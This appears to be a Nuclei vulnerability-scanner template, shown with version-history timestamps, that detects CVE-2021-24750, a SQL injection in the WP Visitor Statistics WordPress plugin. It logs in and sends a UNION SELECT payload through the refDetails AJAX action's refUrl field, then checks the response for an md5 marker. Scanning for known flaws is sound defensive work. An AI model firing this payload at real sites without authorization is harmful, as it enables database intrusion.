2022-01-23 05:17:20 +00:00
id : CVE-2021-24750
info :
name : WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
author : cckuakilong
severity : high
2022-05-17 09:18:12 +00:00
description : The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
2022-01-23 05:17:20 +00:00
reference :
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
2022-01-23 09:08:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
2022-05-17 09:18:12 +00:00
- https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de
- https://plugins.trac.wordpress.org/changeset/2622268
2022-01-23 05:17:20 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
cve-id : CVE-2021-24750
cwe-id : CWE-89
2022-01-23 09:21:25 +00:00
tags : cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
2022-01-23 05:17:20 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
2022-01-23 09:21:25 +00:00
Origin : {{RootURL}}
2022-01-23 05:17:20 +00:00
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-01-23 09:21:25 +00:00
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
2022-01-23 05:17:20 +00:00
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-01-23 09:21:25 +00:00
- "266f89556d2b38ff067b580fb305c522"
2022-01-23 05:17:20 +00:00
- type : status
status :
2022-01-23 09:08:12 +00:00
- 200
